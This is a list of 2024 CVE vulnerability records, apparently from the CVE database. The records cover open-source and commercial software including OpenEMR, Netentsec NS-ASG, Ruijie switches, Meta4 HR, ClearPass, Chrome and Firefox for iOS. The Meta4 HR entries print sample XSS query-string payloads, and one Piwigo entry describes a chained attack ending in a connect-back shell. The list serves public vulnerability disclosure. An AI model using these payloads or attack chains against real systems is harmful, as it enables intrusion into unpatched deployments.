(20240319)
CVE 2024 26476 Candidate An issue in open-emr before v.7.0.2 allows a remote attacker to escalate privileges via a crafted script to the formid parameter in the ereq_form.php component. MISC:https://github.com/c4v4r0n/Research/blob/main/openemr_BlindSSRF/README.md | MISC:https://github.com/mpdf/mpdf/issues/867 Assigned (20240219)
CVE 2024 26475 Candidate An issue in radareorg radare2 v.0.9.7 through v.5.8.6 and fixed in v.5.8.8 allows a local attacker to cause a denial of service via the grub_sfs_read_extent function. MISC:https://github.com/TronciuVlad/CVE-2024-26475 Assigned (20240219)
CVE 2024 26473 Candidate A reflected cross-site scripting (XSS) vulnerability in SocialMediaWebsite v1.0.1 allows attackers to inject malicious JavaScript into the web browser of a victim via the poll parameter in poll.php. MISC:https://github.com/dub-flow/vulnerability-research/tree/main/CVE-2024-26473 | MISC:https://github.com/msaad1999/KLiK-SocialMediaWebsite/ Assigned (20240219)
CVE 2024 26472 Candidate KLiK SocialMediaWebsite version 1.0.1 from msaad1999 has a reflected cross-site scripting (XSS) vulnerability which may allow remote attackers to execute arbitrary JavaScript in the web browser of a user, by including a malicious payload into the 'selector' or 'validator' parameters of 'create-new-pwd.php'. MISC:https://github.com/dub-flow/vulnerability-research/tree/main/CVE-2024-26472 | MISC:https://github.com/msaad1999/KLiK-SocialMediaWebsite/ Assigned (20240219)
CVE 2024 26471 Candidate A reflected cross-site scripting (XSS) vulnerability in zhimengzhe iBarn v1.5 allows attackers to inject malicious JavaScript into the web browser of a victim via the search parameter in offer.php. MISC:https://github.com/dub-flow/vulnerability-research/tree/main/CVE-2024-26471 | MISC:https://github.com/zhimengzhe/iBarn Assigned (20240219)
CVE 2024 26470 Candidate A host header injection vulnerability in the forgot password function of FullStackHero's WebAPI Boilerplate v1.0.0 and v1.0.1 allows attackers to leak the password reset token via a crafted request. MISC:https://github.com/dub-flow/vulnerability-research/tree/main/CVE-2024-26470 | MISC:https://github.com/fullstackhero/dotnet-webapi-boilerplate | MISC:https://www.nuget.org/packages/FullStackHero.WebAPI.Boilerplate Assigned (20240219)
CVE 2024 2647 Candidate A vulnerability, which was classified as critical, has been found in Netentsec NS-ASG Application Security Gateway 6.3. This issue affects some unknown processing of the file /admin/singlelogin.php. The manipulation of the argument loginId leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257285 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257285 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257285 | MISC:VDB-257285 | Netentsec NS-ASG Application Security Gateway singlelogin.php sql injection | URL:https://vuldb.com/?id.257285 | MISC:https://github.com/flyyue2001/cve/blob/main/NS-ASG-sql-singlelogin.md | URL:https://github.com/flyyue2001/cve/blob/main/NS-ASG-sql-singlelogin.md Assigned (20240319)
CVE 2024 26469 Candidate Server-Side Request Forgery (SSRF) vulnerability in Tunis Soft "Product Designer" (productdesigner) module for PrestaShop before version 1.178.36, allows remote attackers to cause a denial of service (DoS) and escalate privileges via the url parameter in the postProcess() method. MISC:https://github.com/friends-of-presta/security-advisories/blob/main/_posts/2024-02-29-productdesigner-918.md Assigned (20240219)
CVE 2024 26468 Candidate A DOM based cross-site scripting (XSS) vulnerability in the component index.html of jstrieb/urlpages before commit 035b647 allows attackers to execute arbitrary Javascript via sending a crafted URL. MISC:https://gist.github.com/cd80/87b41cf58ba04564d55f4a26152bf0a9 Assigned (20240219)
CVE 2024 26467 Candidate A DOM based cross-site scripting (XSS) vulnerability in the component generator.html of tabatkins/railroad-diagrams before commit ea9a123 allows attackers to execute arbitrary Javascript via sending a crafted URL. MISC:https://gist.github.com/cd80/50463b0e62067ec861b7006cbf46b068 Assigned (20240219)
CVE 2024 26466 Candidate A DOM based cross-site scripting (XSS) vulnerability in the component /dom/ranges/Range-test-iframe.html of web-platform-tests/wpt before commit 938e843 allows attackers to execute arbitrary Javascript via sending a crafted URL. MISC:https://gist.github.com/cd80/8e41a17bc0c2113f6347581cec726d11 Assigned (20240219)
CVE 2024 26465 Candidate A DOM based cross-site scripting (XSS) vulnerability in the component /beep/Beep.Instrument.js of stewdio beep.js before commit ef22ad7 allows attackers to execute arbitrary Javascript via sending a crafted URL. MISC:https://gist.github.com/cd80/89527424f733b2b82de876e02d163150 Assigned (20240219)
CVE 2024 26462 Candidate Kerberos 5 (aka krb5) 1.21.2 contains a memory leak vulnerability in /krb5/src/kdc/ndr.c. MISC:https://github.com/LuMingYinDetect/krb5_defects/blob/main/krb5_detect_3.md Assigned (20240219)
CVE 2024 26461 Candidate Kerberos 5 (aka krb5) 1.21.2 contains a memory leak vulnerability in /krb5/src/lib/gssapi/krb5/k5sealv3.c. MISC:https://github.com/LuMingYinDetect/krb5_defects/blob/main/krb5_detect_2.md Assigned (20240219)
CVE 2024 2646 Candidate A vulnerability classified as critical was found in Netentsec NS-ASG Application Security Gateway 6.3. This vulnerability affects unknown code of the file /vpnweb/index.php?para=index. The manipulation of the argument check_VirtualSiteId leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257284. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257284 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257284 | MISC:VDB-257284 | Netentsec NS-ASG Application Security Gateway sql injection | URL:https://vuldb.com/?id.257284 | MISC:https://github.com/flyyue2001/cve/blob/main/NS-ASG-sql-index.md | URL:https://github.com/flyyue2001/cve/blob/main/NS-ASG-sql-index.md Assigned (20240319)
CVE 2024 26458 Candidate Kerberos 5 (aka krb5) 1.21.2 contains a memory leak in /krb5/src/lib/rpc/pmap_rmt.c. MISC:https://github.com/LuMingYinDetect/krb5_defects/blob/main/krb5_detect_1.md Assigned (20240219)
CVE 2024 26455 Candidate fluent-bit 2.2.2 contains a Use-After-Free vulnerability in /fluent-bit/plugins/custom_calyptia/calyptia.c. MISC:https://github.com/LuMingYinDetect/fluent-bit_defects/blob/main/fluent-bit_detect_1.md Assigned (20240219)
CVE 2024 26454 Candidate A Cross Site Scripting vulnerability in Healthcare-Chatbot through 9b7058a can occur via a crafted payload to the email1 or pwd1 parameter in login.php. MISC:https://github.com/OmRajpurkar/Healthcare-Chatbot/issues/4 | MISC:https://medium.com/@0x0d0x0a/healthcare-chatbot-xss-cve-2024-26454-acf2607bf210 Assigned (20240219)
CVE 2024 26450 Candidate An issue exists within Piwigo before v.14.2.0 allowing a malicious user to take over the application. This exploit involves chaining a Cross Site Request Forgery vulnerability to issue a Stored Cross Site Scripting payload stored within an Admin user's dashboard, executing remote JavaScript. This can be used to upload a new PHP file under an administrator and directly call that file from the victim's instance to connect back to a malicious listener. MISC:https://github.com/Piwigo/Piwigo/security/advisories/GHSA-p362-cfpj-q55f Assigned (20240219)
CVE 2024 2645 Candidate A vulnerability classified as problematic has been found in Netentsec NS-ASG Application Security Gateway 6.3. This affects an unknown part of the file /vpnweb/resetpwd/resetpwd.php. The manipulation of the argument UserId leads to improper neutralization of data within xpath expressions. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257283. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257283 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257283 | MISC:VDB-257283 | Netentsec NS-ASG Application Security Gateway resetpwd.php xpath injection | URL:https://vuldb.com/?id.257283 | MISC:https://github.com/flyyue2001/cve/blob/main/NS-ASG-sql-laddfirewall.md | URL:https://github.com/flyyue2001/cve/blob/main/NS-ASG-sql-laddfirewall.md Assigned (20240319)
CVE 2024 26445 Candidate flusity-CMS v2.33 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /core/tools/delete_place.php MISC:https://github.com/xiaolanjing0/cms/blob/main/1.md Assigned (20240219)
CVE 2024 2644 Candidate A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3. It has been rated as critical. Affected by this issue is some unknown functionality of the file /protocol/firewall/addfirewall.php. The manipulation of the argument FireWallTableArray leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-257282 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257282 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257282 | MISC:VDB-257282 | Netentsec NS-ASG Application Security Gateway addfirewall.php sql injection | URL:https://vuldb.com/?id.257282 | MISC:https://github.com/hundanchen69/cve/blob/main/NS-ASG-sql-laddfirewall.md | URL:https://github.com/hundanchen69/cve/blob/main/NS-ASG-sql-laddfirewall.md Assigned (20240319)
CVE 2024 2642 Candidate A vulnerability was found in Ruijie RG-NBS2009G-P up to 20240305. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /EXCU_SHELL. The manipulation of the argument Command1 leads to command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257281 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257281 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257281 | MISC:VDB-257281 | Ruijie RG-NBS2009G-P EXCU_SHELL command injection | URL:https://vuldb.com/?id.257281 | MISC:https://h0e4a0r1t.github.io/2024/vulns/Ruijie%20RG-NBS2009G-P%20switch%20has%20a%20foreground%20CLI%20command%20injection%20vulnerability.pdf | URL:https://h0e4a0r1t.github.io/2024/vulns/Ruijie%20RG-NBS2009G-P%20switch%20has%20a%20foreground%20CLI%20command%20injection%20vulnerability.pdf Assigned (20240319)
CVE 2024 2641 Candidate A vulnerability was found in Ruijie RG-NBS2009G-P up to 20240305. It has been classified as critical. Affected is an unknown function of the file /system/passwdManage.htm of the component Password Handler. The manipulation leads to improper authorization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257280. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257280 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257280 | MISC:VDB-257280 | Ruijie RG-NBS2009G-P Password passwdManage.htm improper authorization | URL:https://vuldb.com/?id.257280 | MISC:https://h0e4a0r1t.github.io/2024/vulns/Unauthorized%20access%20vulnerability%20in%20Ruijie%20RG-NBS2009G-P%20switch.pdf | URL:https://h0e4a0r1t.github.io/2024/vulns/Unauthorized%20access%20vulnerability%20in%20Ruijie%20RG-NBS2009G-P%20switch.pdf Assigned (20240319)
CVE 2024 2639 Candidate A vulnerability was found in Bdtask Wholesale Inventory Management System up to 20240311. It has been declared as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to session fixiation. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257245 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257245 | Bdtask Wholesale Inventory Management System session fixiation | URL:https://vuldb.com/?id.257245 | MISC:VDB-257245 | CTI Indicators (IOB, IOC) | URL:https://vuldb.com/?ctiid.257245 | MISC:https://drive.google.com/file/d/1bNnSNssAeQFkO0FdW_yaEvDg5XExMPaf/view?usp=drivesdk | URL:https://drive.google.com/file/d/1bNnSNssAeQFkO0FdW_yaEvDg5XExMPaf/view?usp=drivesdk Assigned (20240319)
CVE 2024 26369 Candidate An issue in the HistoryQosPolicy component of FastDDS v2.12.x, v2.11.x, v2.10.x, and v2.6.x leads to a SIGABRT (signal abort) upon receiving DataWriter's data. MISC:https://github.com/eProsima/Fast-DDS/issues/4365 | MISC:https://github.com/eProsima/Fast-DDS/pull/4375 Assigned (20240219)
CVE 2024 2636 Candidate An Unrestricted Upload of File vulnerability has been found on Cegid Meta4 HR, that allows an attacker to upload malicios files to the server via '/config/espanol/update_password.jsp' file. Modifying the 'M4_NEW_PASSWORD' parameter, an attacker could store a malicious JSP file inside the file directory, to be executed the the file is loaded in the application. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-meta4-hr-cegid | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-meta4-hr-cegid Assigned (20240319)
CVE 2024 26352 Candidate flusity-CMS v2.33 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /core/tools/add_places.php MISC:https://github.com/Icycu123/cms/blob/main/3.md Assigned (20240219)
CVE 2024 26351 Candidate flusity-CMS v2.33 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /core/tools/update_place.php MISC:https://github.com/Icycu123/cms/blob/main/4.md Assigned (20240219)
CVE 2024 26350 Candidate flusity-CMS v2.33 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /core/tools/update_contact_form_settings.php MISC:https://github.com/Icycu123/cms/blob/main/2.md Assigned (20240219)
CVE 2024 2635 Candidate The configuration pages available are not intended to be placed on an Internet facing web server, as they expose file paths to the client, who can be an attacker. Instead of rewriting these pages to avoid this vulnerability, they will be dismissed from future releases of Cegid Meta4 HR, as they do not offer product functionality MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-meta4-hr-cegid | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-meta4-hr-cegid Assigned (20240319)
CVE 2024 26349 Candidate flusity-CMS v2.33 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /core/tools/delete_translation.php MISC:https://github.com/Icycu123/cms/blob/main/1.md Assigned (20240219)
CVE 2024 26342 Candidate A Null pointer dereference in usr/sbin/httpd in ASUS AC68U 3.0.0.4.384.82230 allows remote attackers to trigger DoS via network packet. MISC:https://github.com/Nicholas-wei/bug-discovery/blob/main/asus/2/ASUS_ac68u.md Assigned (20240219)
CVE 2024 2634 Candidate A Cross-Site Scripting Vulnerability has been found on Meta4 HR affecting version 819.001.022 and earlier. The endpoint '/sse_generico/generico_login.jsp' is vulnerable to XSS attack via 'lang' query, i.e. '/sse_generico/generico_login.jsp?lang=%27%3balert(%27BLEUSS%27)%2f%2f¶ms='. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-meta4-hr-cegid | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-meta4-hr-cegid Assigned (20240319)
CVE 2024 26339 Candidate swftools v0.9.2 was discovered to contain a strcpy parameter overlap via /home/swftools/src/swfc+0x48318a. MISC:https://github.com/matthiaskramm/swftools/issues/225 Assigned (20240219)
CVE 2024 26337 Candidate swftools v0.9.2 was discovered to contain a segmentation violation via the function s_font at swftools/src/swfc.c. MISC:https://github.com/matthiaskramm/swftools/issues/223 Assigned (20240219)
CVE 2024 26335 Candidate swftools v0.9.2 was discovered to contain a segmentation violation via the function state_free at swftools/src/swfc-history.c. MISC:https://github.com/matthiaskramm/swftools/issues/222 Assigned (20240219)
CVE 2024 26334 Candidate swftools v0.9.2 was discovered to contain a segmentation violation via the function compileSWFActionCode at swftools/lib/action/actioncompiler.c. MISC:https://github.com/matthiaskramm/swftools/issues/221 Assigned (20240219)
CVE 2024 26333 Candidate swftools v0.9.2 was discovered to contain a segmentation violation via the function free_lines at swftools/lib/modules/swfshape.c. MISC:https://github.com/matthiaskramm/swftools/issues/219 Assigned (20240219)
CVE 2024 2633 Candidate A Cross-Site Scripting Vulnerability has been found on Meta4 HR affecting version 819.001.022 and earlier. The endpoint '/sitetest/english/dumpenv.jsp' is vulnerable to XSS attack by 'lang' query, i.e. '/sitetest/english/dumpenv.jsp?snoop=yes&lang=%27%3Cimg%20src/onerror=alert(1)%3E¶ms'. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-meta4-hr-cegid | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-meta4-hr-cegid Assigned (20240319)
CVE 2024 26328 Candidate An issue was discovered in QEMU 7.1.0 through 8.2.1. register_vfs in hw/pci/pcie_sriov.c does not set NumVFs to PCI_SRIOV_TOTAL_VF, and thus interaction with hw/nvme/ctrl.c is mishandled. MISC:https://lore.kernel.org/all/20240213055345-mutt-send-email-mst@kernel.org/ Assigned (20240219)
CVE 2024 26327 Candidate An issue was discovered in QEMU 7.1.0 through 8.2.1. register_vfs in hw/pci/pcie_sriov.c mishandles the situation where a guest writes NumVFs greater than TotalVFs, leading to a buffer overflow in VF implementations. MISC:https://lore.kernel.org/all/20240214-reuse-v4-5-89ad093a07f4@daynix.com/ Assigned (20240219)
CVE 2024 2632 Candidate A Information Exposure Vulnerability has been found on Meta4 HR. This vulnerability allows an attacker to obtain a lot of information about the application such as the variables set in the process, the Tomcat versions, library versions and underlying operation system via HTTP GET '/sitetest/english/dumpenv.jsp'. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-meta4-hr-cegid | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-meta4-hr-cegid Assigned (20240319)
CVE 2024 26318 Candidate Serenity before 6.8.0 allows XSS via an email link because LoginPage.tsx permits return URLs that do not begin with a / character. MISC:https://serenity.is/docs/release-notes/6.8.0 Assigned (20240219)
CVE 2024 26313 Candidate Archer Platform 6.x before 6.14 P2 HF2 (6.14.0.2.2) contains a stored cross-site scripting (XSS) vulnerability. A remote authenticated malicious Archer user could potentially exploit this to store malicious HTML or JavaScript code in a trusted application data store. When victim users access the data store through their browsers, the malicious code gets executed by the web browser in the context of the vulnerable application. 6.13.P3 HF1 (6.13.0.3.1) is also a fixed release. MISC:https://archerirm.com | MISC:https://www.archerirm.community/t5/platform-announcements/archer-update-for-multiple-vulnerabilities/ta-p/717102 Assigned (20240219)
CVE 2024 26311 Candidate Archer Platform 6.x before 6.14 P2 HF1 (6.14.0.2.1) contains a reflected XSS vulnerability. A remote authenticated malicious Archer user could potentially exploit this by tricking a victim application user into supplying malicious JavaScript code to the vulnerable web application. This code is then reflected to the victim and gets executed by the web browser in the context of the vulnerable web application. MISC:https://archerirm.com | MISC:https://www.archerirm.community/t5/platform-announcements/archer-update-for-multiple-vulnerabilities/ta-p/716134 Assigned (20240219)
CVE 2024 26310 Candidate Archer Platform 6.8 before 6.14 P2 (6.14.0.2) contains an improper access control vulnerability. A remote authenticated malicious user could potentially exploit this to gain access to API information that should only be accessible with extra privileges. MISC:https://archerirm.com | MISC:https://www.archerirm.community/t5/platform-announcements/archer-update-for-multiple-vulnerabilities/ta-p/716134 Assigned (20240219)
CVE 2024 2631 Candidate Inappropriate implementation in iOS in Google Chrome prior to 123.0.6312.58 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low) FEDORA:FEDORA-2024-01f4c93547 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AQVVW4FLQDIJ2UABGXK2SMS5AUGT54FM/ | FEDORA:FEDORA-2024-ec79868e3b | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2D3Z6CRRN4J3IUZPJZVURGMRBN6WFPTU/ | FEDORA:FEDORA-2024-f9eb1130c8 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6JINDYFB3MPH43ECTI72BV63K4RXSG22/ | MISC:https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop_19.html | URL:https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop_19.html | MISC:https://issues.chromium.org/issues/41495878 | URL:https://issues.chromium.org/issues/41495878 Assigned (20240319)
CVE 2024 26309 Candidate Archer Platform 6.x before 6.14 P2 HF2 (6.14.0.2.2) contains a sensitive information disclosure vulnerability. An unauthenticated attacker could potentially obtain access to sensitive information via an internal URL. MISC:https://archerirm.com | MISC:https://www.archerirm.community/t5/platform-announcements/archer-update-for-multiple-vulnerabilities/ta-p/717102 Assigned (20240219)
CVE 2024 26308 Candidate Allocation of Resources Without Limits or Throttling vulnerability in Apache Commons Compress.This issue affects Apache Commons Compress: from 1.21 before 1.26. Users are recommended to upgrade to version 1.26, which fixes the issue. CONFIRM:https://security.netapp.com/advisory/ntap-20240307-0009/ | MISC:https://lists.apache.org/thread/ch5yo2d21p7vlqrhll9b17otbyq4npfg | URL:https://lists.apache.org/thread/ch5yo2d21p7vlqrhll9b17otbyq4npfg | MLIST:[oss-security] 20240219 CVE-2024-26308: Apache Commons Compress: OutOfMemoryError unpacking broken Pack200 file | URL:http://www.openwall.com/lists/oss-security/2024/02/19/2 Assigned (20240217)
CVE 2024 26307 Candidate Possible race condition vulnerability in Apache Doris. Some of code using `chmod()` method. This method run the risk of someone renaming the file out from under user and chmodding the wrong file. This could theoretically happen, but the impact would be minimal. This issue affects Apache Doris: before 1.2.8, before 2.0.4. Users are recommended to upgrade to version 2.0.4, which fixes the issue. MISC:https://lists.apache.org/thread/5shhw8x8m271hd2wfwzqzwgf36pmc4pl | URL:https://lists.apache.org/thread/5shhw8x8m271hd2wfwzqzwgf36pmc4pl Assigned (20240217)
CVE 2024 26302 Candidate A vulnerability in the web-based management interface of ClearPass Policy Manager could allow a remote attacker authenticated with low privileges to access sensitive information. A successful exploit allows an attacker to retrieve information which could be used to potentially gain further access to network services supported by ClearPass Policy Manager. MISC:https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-001.txt | URL:https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-001.txt Assigned (20240216)
CVE 2024 26300 Candidate A vulnerability in the guest interface of ClearPass Policy Manager could allow an authenticated remote attacker to conduct a stored cross-site scripting (XSS) attack against an administrative user of the interface. A successful exploit allows an attacker to execute arbitrary script code in a victim's browser in the context of the affected interface. MISC:https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-001.txt | URL:https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-001.txt Assigned (20240216)
CVE 2024 2630 Candidate Inappropriate implementation in iOS in Google Chrome prior to 123.0.6312.58 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) FEDORA:FEDORA-2024-01f4c93547 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AQVVW4FLQDIJ2UABGXK2SMS5AUGT54FM/ | FEDORA:FEDORA-2024-ec79868e3b | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2D3Z6CRRN4J3IUZPJZVURGMRBN6WFPTU/ | FEDORA:FEDORA-2024-f9eb1130c8 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6JINDYFB3MPH43ECTI72BV63K4RXSG22/ | MISC:https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop_19.html | URL:https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop_19.html | MISC:https://issues.chromium.org/issues/41481877 | URL:https://issues.chromium.org/issues/41481877 Assigned (20240319)
CVE 2024 26299 Candidate A vulnerability in the web-based management interface of ClearPass Policy Manager could allow an authenticated remote attacker to conduct a stored cross-site scripting (XSS) attack against an administrative user of the interface. A successful exploit allows an attacker to execute arbitrary script code in a victim's browser in the context of the affected interface. MISC:https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-001.txt | URL:https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-001.txt Assigned (20240216)
CVE 2024 26298 Candidate Vulnerabilities in the ClearPass Policy Manager web-based management interface allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to complete system compromise. MISC:https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-001.txt | URL:https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-001.txt Assigned (20240216)
CVE 2024 2629 Candidate Incorrect security UI in iOS in Google Chrome prior to 123.0.6312.58 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium) FEDORA:FEDORA-2024-01f4c93547 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AQVVW4FLQDIJ2UABGXK2SMS5AUGT54FM/ | FEDORA:FEDORA-2024-ec79868e3b | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2D3Z6CRRN4J3IUZPJZVURGMRBN6WFPTU/ | FEDORA:FEDORA-2024-f9eb1130c8 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6JINDYFB3MPH43ECTI72BV63K4RXSG22/ | MISC:https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop_19.html | URL:https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop_19.html | MISC:https://issues.chromium.org/issues/41487721 | URL:https://issues.chromium.org/issues/41487721 Assigned (20240319)
CVE 2024 26288 Candidate An unauthenticated remote attacker can influence the communication due to the lack of encryption of sensitive data via a MITM. Charging is not affected. MISC:https://cert.vde.com/en/advisories/VDE-2024-011 | URL:https://cert.vde.com/en/advisories/VDE-2024-011 Assigned (20240216)
CVE 2024 26284 Candidate Utilizing a 302 redirect, an attacker could have conducted a Universal Cross-Site Scripting (UXSS) on a victim website, if the victim had a link to the attacker's website. This vulnerability affects Focus for iOS < 123. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1860075 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1860075 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-10/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-10/ Assigned (20240215)
CVE 2024 26283 Candidate An attacker could have executed unauthorized scripts on top origin sites using a JavaScript URI when opening an external URL with a custom Firefox scheme. This vulnerability affects Firefox for iOS < 123. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1850158 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1850158 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-08/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-08/ Assigned (20240215)
CVE 2024 26282 Candidate Using an AMP url with a canonical element, an attacker could have executed JavaScript from an opened bookmarked page. This vulnerability affects Firefox for iOS < 123. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1863788 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1863788 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-08/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-08/ Assigned (20240215)
CVE 2024 26281 Candidate Upon scanning a JavaScript URI with the QR code scanner, an attacker could have executed unauthorized scripts on the current top origin sites in the URL bar. This vulnerability affects Firefox for iOS < 123. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1868005 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1868005 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-08/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-08/ Assigned (20240215)
CVE 2024 26280 Candidate Apache Airflow, versions before 2.8.2, has a vulnerability that allows authenticated Ops and Viewers users to view all information on audit logs, including dag names and usernames they were not permitted to view. With 2.8.2 and newer, Ops and Viewer users do not have audit log permission by default, they need to be explicitly granted permissions to see the logs. Only admin users have audit log permission by default. Users of Apache Airflow are recommended to upgrade to version 2.8.2 or newer to mitigate the risk associated with this vulnerability MISC:https://github.com/apache/airflow/pull/37501 | URL:https://github.com/apache/airflow/pull/37501 | MISC:https://lists.apache.org/thread/knskxxxml95091rsnpxkpo1jjp8rj0fh | URL:https://lists.apache.org/thread/knskxxxml95091rsnpxkpo1jjp8rj0fh Assigned (20240215)
CVE 2024 2628 Candidate Inappropriate implementation in Downloads in Google Chrome prior to 123.0.6312.58 allowed a remote attacker to perform UI spoofing via a crafted URL. (Chromium security severity: Medium) FEDORA:FEDORA-2024-01f4c93547 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AQVVW4FLQDIJ2UABGXK2SMS5AUGT54FM/ | FEDORA:FEDORA-2024-ec79868e3b | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2D3Z6CRRN4J3IUZPJZVURGMRBN6WFPTU/ | FEDORA:FEDORA-2024-f9eb1130c8 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6JINDYFB3MPH43ECTI72BV63K4RXSG22/ | MISC:https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop_19.html | URL:https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop_19.html | MISC:https://issues.chromium.org/issues/41487774 | URL:https://issues.chromium.org/issues/41487774 Assigned (20240319)
CVE 2024 26270 Candidate The Account Settings page in Liferay Portal 7.4.3.76 through 7.4.3.99, and Liferay DXP 2023.Q3 before patch 5, and 7.4 update 76 through 92 embeds the user’s hashed password in the page’s HTML source, which allows man-in-the-middle attackers to steal a user's hashed password. MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-26270 | URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-26270 Assigned (20240215)
